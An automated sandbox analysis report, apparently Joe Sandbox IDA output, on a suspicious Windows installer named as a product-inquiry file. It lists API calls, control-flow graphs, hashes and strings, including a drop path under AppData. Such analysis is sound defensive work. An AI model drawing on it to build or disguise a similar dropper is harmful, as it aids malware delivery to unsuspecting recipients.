                                                                          • Part of subcall function 00404366: SendMessageW.USER32(00000028,?,00000001,00404191), ref: 00404374
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405742
                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005516,00000000), ref: 00405750
                                                                        • CloseHandle.KERNELBASE(00000000), ref: 00405757
                                                                        • ShowWindow.USER32(00000000), ref: 0040577B
                                                                        • ShowWindow.USER32(?,00000008), ref: 00405780
                                                                        • ShowWindow.USER32(00000008), ref: 004057CA
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057FE
                                                                        • CreatePopupMenu.USER32 ref: 0040580F
                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405823
                                                                        • GetWindowRect.USER32(?,?), ref: 00405843
                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040585C
                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405894
                                                                        • OpenClipboard.USER32(00000000), ref: 004058A4
                                                                        • EmptyClipboard.USER32 ref: 004058AA
                                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058B6
                                                                        • GlobalLock.KERNEL32(00000000), ref: 004058C0
                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058D4
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004058F4
                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 004058FF
                                                                        • CloseClipboard.USER32 ref: 00405905
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                        • String ID: {
                                                                        • API String ID: 590372296-366298937
                                                                        • Opcode ID: 1c11f1d1f2960514ee8f576ab35b46c7fdc2af1ec017614083a580ed69c7742d
                                                                        • Instruction ID: 548bfd7703c7e8b67cc6bd423be8dd859740628245fa72e8840ee51ebf386eb0
                                                                        • Opcode Fuzzy Hash: 1c11f1d1f2960514ee8f576ab35b46c7fdc2af1ec017614083a580ed69c7742d
                                                                        • Instruction Fuzzy Hash: D0B159B0900609FFDB11AF61DD89AAE7B79FB44354F00803AFA45B61A0C7754E51DF68

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 656 406afa-406aff 657 406b70-406b8e 656->657 658 406b01-406b30 656->658 661 407166-40717b 657->661 659 406b32-406b35 658->659 660 406b37-406b3b 658->660 662 406b47-406b4a 659->662 663 406b43 660->663 664 406b3d-406b41 660->664 665 407195-4071ab 661->665 666 40717d-407193 661->666 668 406b68-406b6b 662->668 669 406b4c-406b55 662->669 663->662 664->662 667 4071ae-4071b5 665->667 666->667 672 4071b7-4071bb 667->672 673 4071dc-4071e8 667->673 674 406d3d-406d5b 668->674 670 406b57 669->670 671 406b5a-406b66 669->671 670->671 677 406bd0-406bfe 671->677 678 4071c1-4071d9 672->678 679 40736a-407374 672->679 685 40697e-406987 673->685 675 406d73-406d85 674->675 676 406d5d-406d71 674->676 683 406d88-406d92 675->683 676->683 681 406c00-406c18 677->681 682 406c1a-406c34 677->682 678->673 684 407380-407393 679->684 687 406c37-406c41 681->687 682->687 688 406d94 683->688 689 406d35-406d3b 683->689 686 407398-40739c 684->686 690 407395 685->690 691 40698d 685->691 693 406c47 687->693 694 406bb8-406bbe 687->694 695 406d10-406d14 688->695 696 406ea5-406eb2 688->696 689->674 692 406cd9-406ce3 689->692 690->686 697 406994-406998 691->697 698 406ad4-406af5 691->698 699 406a39-406a3d 691->699 700 406aa9-406aad 691->700 709 407328-407332 692->709 710 406ce9-406d0b 692->710 717 407304-40730e 693->717 718 406b9d-406bb5 693->718 711 406c71-406c77 694->711 712 406bc4-406bca 694->712 701 406d1a-406d32 695->701 702 40731c-407326 695->702 696->685 697->684 706 40699e-4069ab 697->706 698->661 703 406a43-406a5c 699->703 704 4072e9-4072f3 699->704 707 406ab3-406ac7 700->707 708 4072f8-407302 700->708 701->689 702->684 714 406a5f-406a63 703->714 704->684 706->690 716 4069b1-4069f7 706->716 719 406aca-406ad2 707->719 708->684 709->684 710->696 713 406cd5 711->713 715 406c79-406c97 711->715 712->677 712->713 713->692 714->699 720 406a65-406a6b 714->720 721 406c99-406cad 715->721 722 406caf-406cc1 715->722 723 4069f9-4069fd 716->723 724 406a1f-406a21 716->724 717->684 718->694 719->698 719->700 727 406a95-406aa7 720->727 728 406a6d-406a74 720->728 729 406cc4-406cce 721->729 722->729 730 406a08-406a16 GlobalAlloc 723->730 731 4069ff-406a02 GlobalFree 723->731 725 406a23-406a2d 724->725 726 406a2f-406a37 724->726 725->725 725->726 726->714 727->719 732 406a76-406a79 GlobalFree 728->732 733 406a7f-406a8f GlobalAlloc 728->733 729->711 734 406cd0 729->734 730->690 735 406a1c 730->735 731->730 732->733 733->690 733->727 737 407310-40731a 734->737 738 406c56-406c6e 734->738 735->724 737->684 738->711
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8e4b5ecac14f05fa2fd75170ea9dc483b74f0c48ec088bd1d9ad5172d207252c
                                                                        • Instruction ID: 1b8bdd5ad4fc83de7ba6cec7d94a6212227b50c179fbf06187fd9840cc1d6bdc
                                                                        • Opcode Fuzzy Hash: 8e4b5ecac14f05fa2fd75170ea9dc483b74f0c48ec088bd1d9ad5172d207252c
                                                                        • Instruction Fuzzy Hash: 44F18770D04229CBDF18CFA8C8946ADBBB1FF45305F25816ED852BB281D7386A86DF45
                                                                        APIs
                                                                        • FindFirstFileW.KERNELBASE(75923420,00426758,00425F10,00405E01,00425F10,00425F10,00000000,00425F10,00425F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00406744
                                                                        • FindClose.KERNEL32(00000000), ref: 00406750
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID: XgB
                                                                        • API String ID: 2295610775-796949446
                                                                        • Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                                        • Instruction ID: 870aa7139b81afaf1942c507467f7acad87ed8de72819481db2edd1f78cd0942
                                                                        • Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                                        • Instruction Fuzzy Hash: 09D012316042305FC35127387E4C84B7B9A9F563393228B76B5AAF21E0C7748C3287AC

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 190 403e58-403e6a 191 403e70-403e76 190->191 192 403fab-403fba 190->192 191->192 193 403e7c-403e85 191->193 194 404009-40401e 192->194 195 403fbc-404004 GetDlgItem * 2 call 404331 SetClassLongW call 40140b 192->195 196 403e87-403e94 SetWindowPos 193->196 197 403e9a-403e9d 193->197 199 404020-404023 194->199 200 40405e-404063 call 40437d 194->200 195->194 196->197 201 403eb7-403ebd 197->201 202 403e9f-403eb1 ShowWindow 197->202 204 404025-404030 call 401389 199->204 205 404056-404058 199->205 207 404068-404083 200->207 208 403ed9-403edc 201->208 209 403ebf-403ed4 DestroyWindow 201->209 202->201 204->205 227 404032-404051 SendMessageW 204->227 205->200 212 4042fe 205->212 213 404085-404087 call 40140b 207->213 214 40408c-404092 207->214 218 403ede-403eea SetWindowLongW 208->218 219 403eef-403ef5 208->219 215 4042db-4042e1 209->215 217 404300-404307 212->217 213->214 223 404098-4040a3 214->223 224 4042bc-4042d5 DestroyWindow EndDialog 214->224 215->212 222 4042e3-4042e9 215->222 218->217 225 403f98-403fa6 call 404398 219->225 226 403efb-403f0c GetDlgItem 219->226 222->212 228 4042eb-4042f4 ShowWindow 222->228 223->224 229 4040a9-4040f6 call 406418 call 404331 * 3 GetDlgItem 223->229 224->215 225->217 230 403f2b-403f2e 226->230 231 403f0e-403f25 SendMessageW IsWindowEnabled 226->231 227->217 228->212 260 404100-40413c ShowWindow KiUserCallbackDispatcher call 404353 EnableWindow 229->260 261 4040f8-4040fd 229->261 235 403f30-403f31 230->235 236 403f33-403f36 230->236 231->212 231->230 238 403f61-403f66 call 40430a 235->238 239 403f44-403f49 236->239 240 403f38-403f3e 236->240 238->225 241 403f4b-403f51 239->241 242 403f7f-403f92 SendMessageW 239->242 240->242 245 403f40-403f42 240->245 246 403f53-403f59 call 40140b 241->246 247 403f68-403f71 call 40140b 241->247 242->225 245->238 256 403f5f 246->256 247->225 257 403f73-403f7d 247->257 256->238 257->256 264 404141 260->264 265 40413e-40413f 260->265 261->260 266 404143-404171 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404173-404184 SendMessageW 266->267 268 404186 266->268 269 40418c-4041cb call 404366 call 403e39 call 4063db lstrlenW call 406418 SetWindowTextW call 401389 267->269 268->269 269->207 280 4041d1-4041d3 269->280 280->207 281 4041d9-4041dd 280->281 282 4041fc-404210 DestroyWindow 281->282 283 4041df-4041e5 281->283 282->215 285 404216-404243 CreateDialogParamW 282->285 283->212 284 4041eb-4041f1 283->284 284->207 286 4041f7 284->286 285->215 287 404249-4042a0 call 404331 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->212 287->212 292 4042a2-4042b5 ShowWindow call 40437d 287->292 294 4042ba 292->294 294->215
                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E94
                                                                        • ShowWindow.USER32(?), ref: 00403EB1
                                                                        • DestroyWindow.USER32 ref: 00403EC5
                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EE1
                                                                        • GetDlgItem.USER32(?,?), ref: 00403F02
                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F16
                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403F1D
                                                                        • GetDlgItem.USER32(?,00000001), ref: 00403FCB
                                                                        • GetDlgItem.USER32(?,00000002), ref: 00403FD5
                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00403FEF
                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404040
                                                                        • GetDlgItem.USER32(?,00000003), ref: 004040E6
                                                                        • ShowWindow.USER32(00000000,?), ref: 00404107
                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404119
                                                                        • EnableWindow.USER32(?,?), ref: 00404134
                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040414A
                                                                        • EnableMenuItem.USER32(00000000), ref: 00404151
                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404169
                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040417C
                                                                        • lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004041A6
                                                                        • SetWindowTextW.USER32(?,00423708), ref: 004041BA
                                                                        • ShowWindow.USER32(?,0000000A), ref: 004042EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                        • String ID:
                                                                        • API String ID: 3282139019-0
                                                                        • Opcode ID: d83b3cb20f42b8f676c26746797d707651e156971b34bf602c1fafe6ed444bae
                                                                        • Instruction ID: 0a9eb52b79e7a1f6ac08be675ff74ca1e342e547d7f0445f300758720cde36e9
                                                                        • Opcode Fuzzy Hash: d83b3cb20f42b8f676c26746797d707651e156971b34bf602c1fafe6ed444bae
                                                                        • Instruction Fuzzy Hash: 0EC1D0B1600305EBDB216F62ED88D2A3A78FB95745F51053EFA42B11F0CB794852DB2D

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 295 403aaa-403ac2 call 4067d0 298 403ac4-403ad4 call 406322 295->298 299 403ad6-403b0d call 4062a9 295->299 308 403b30-403b59 call 403d80 call 405db8 298->308 303 403b25-403b2b lstrcatW 299->303 304 403b0f-403b20 call 4062a9 299->304 303->308 304->303 313 403beb-403bf3 call 405db8 308->313 314 403b5f-403b64 308->314 319 403c01-403c26 LoadImageW 313->319 320 403bf5-403bfc call 406418 313->320 314->313 315 403b6a-403b84 call 4062a9 314->315 321 403b89-403b92 315->321 324 403ca7-403caf call 40140b 319->324 325 403c28-403c58 RegisterClassW 319->325 320->319 321->313 322 403b94-403b98 321->322 326 403baa-403bb6 lstrlenW 322->326 327 403b9a-403ba7 call 405cdd 322->327 338 403cb1-403cb4 324->338 339 403cb9-403cc4 call 403d80 324->339 328 403d76 325->328 329 403c5e-403ca2 SystemParametersInfoW CreateWindowExW 325->329 333 403bb8-403bc6 lstrcmpiW 326->333 334 403bde-403be6 call 405cb0 call 4063db 326->334 327->326 332 403d78-403d7f 328->332 329->324 333->334 337 403bc8-403bd2 GetFileAttributesW 333->337 334->313 341 403bd4-403bd6 337->341 342 403bd8-403bd9 call 405cfc 337->342 338->332 348 403cca-403ce4 ShowWindow call 406760 339->348 349 403d4d-403d4e call 405516 339->349 341->334 341->342 342->334 354 403cf0-403d02 GetClassInfoW 348->354 355 403ce6-403ceb call 406760 348->355 352 403d53-403d55 349->352 356 403d57-403d5d 352->356 357 403d6f-403d71 call 40140b 352->357 360 403d04-403d14 GetClassInfoW RegisterClassW 354->360 361 403d1a-403d3d DialogBoxParamW call 40140b 354->361 355->354 356->338 362 403d63-403d6a call 40140b 356->362 357->328 360->361 365 403d42-403d4b call 4039fa 361->365 362->338 365->332
                                                                        APIs
                                                                          • Part of subcall function 004067D0: GetModuleHandleA.KERNEL32(?,00000020,?,00403501,0000000B), ref: 004067E2
                                                                          • Part of subcall function 004067D0: GetProcAddress.KERNEL32(00000000,?), ref: 004067FD
                                                                        • lstrcatW.KERNEL32(1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe",00000000), ref: 00403B2B
                                                                        • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseksamener,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,75923420), ref: 00403BAB
                                                                        • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseksamener,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403BBE
                                                                        • GetFileAttributesW.KERNEL32(: Completed), ref: 00403BC9
                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseksamener), ref: 00403C12
                                                                          • Part of subcall function 00406322: wsprintfW.USER32 ref: 0040632F
                                                                        • RegisterClassW.USER32(004291C0), ref: 00403C4F
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C67
                                                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C9C
                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403CD2
                                                                        • GetClassInfoW.USER32(00000000,RichEdit20W,004291C0), ref: 00403CFE
                                                                        • GetClassInfoW.USER32(00000000,RichEdit,004291C0), ref: 00403D0B
                                                                        • RegisterClassW.USER32(004291C0), ref: 00403D14
                                                                        • DialogBoxParamW.USER32(?,00000000,00403E58,00000000), ref: 00403D33
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: "C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseksamener$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                        • API String ID: 1975747703-430864689
                                                                        • Opcode ID: dbb4ca74fc3a6d2deb656d7045d0de6d4851690d360deb7c7385808899b266f3
                                                                        • Instruction ID: a24d2e849b10ad8e1ed533e9d37a820f5d0e6b510d4fa7617ff35d8301a60578
                                                                        • Opcode Fuzzy Hash: dbb4ca74fc3a6d2deb656d7045d0de6d4851690d360deb7c7385808899b266f3
                                                                        • Instruction Fuzzy Hash: E761B670244600BAD720AF669D45E2B3A7CEB84B0AF40457FFD41B62E2DB7D5912CA2D

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 369 403015-403063 GetTickCount GetModuleFileNameW call 405ed1 372 403065-40306a 369->372 373 40306f-40309d call 4063db call 405cfc call 4063db GetFileSize 369->373 375 403245-403249 372->375 381 4030a3 373->381 382 403188-403196 call 402fb1 373->382 384 4030a8-4030bf 381->384 388 403198-40319b 382->388 389 4031eb-4031f0 382->389 386 4030c1 384->386 387 4030c3-4030cc call 403431 384->387 386->387 395 4031f2-4031fa call 402fb1 387->395 396 4030d2-4030d9 387->396 391 40319d-4031b5 call 403447 call 403431 388->391 392 4031bf-4031e9 GlobalAlloc call 403447 call 40324c 388->392 389->375 391->389 418 4031b7-4031bd 391->418 392->389 416 4031fc-40320d 392->416 395->389 400 403155-403159 396->400 401 4030db-4030ef call 405e8c 396->401 406 403163-403169 400->406 407 40315b-403162 call 402fb1 400->407 401->406 415 4030f1-4030f8 401->415 412 403178-403180 406->412 413 40316b-403175 call 4068bd 406->413 407->406 412->384 417 403186 412->417 413->412 415->406 422 4030fa-403101 415->422 423 403215-40321a 416->423 424 40320f 416->424 417->382 418->389 418->392 422->406 425 403103-40310a 422->425 426 40321b-403221 423->426 424->423 425->406 427 40310c-403113 425->427 426->426 428 403223-40323e SetFilePointer call 405e8c 426->428 427->406 429 403115-403135 427->429 432 403243 428->432 429->389 431 40313b-40313f 429->431 433 403141-403145 431->433 434 403147-40314f 431->434 432->375 433->417 433->434 434->406 435 403151-403153 434->435 435->406
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00403026
                                                                        • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000007,00000009,0000000B), ref: 00403042
                                                                          • Part of subcall function 00405ED1: GetFileAttributesW.KERNELBASE(00438800,00403055,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405ED5
                                                                          • Part of subcall function 00405ED1: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405EF7
                                                                        • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
                                                                        • GlobalAlloc.KERNELBASE(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040301C
                                                                        • "C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe", xrefs: 00403015
                                                                        • soft, xrefs: 00403103
                                                                        • Error launching installer, xrefs: 00403065
                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004031EB
                                                                        • Inst, xrefs: 004030FA
                                                                        • Null, xrefs: 0040310C
                                                                        • C:\Users\user\Desktop, xrefs: 00403070, 00403075, 0040307B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
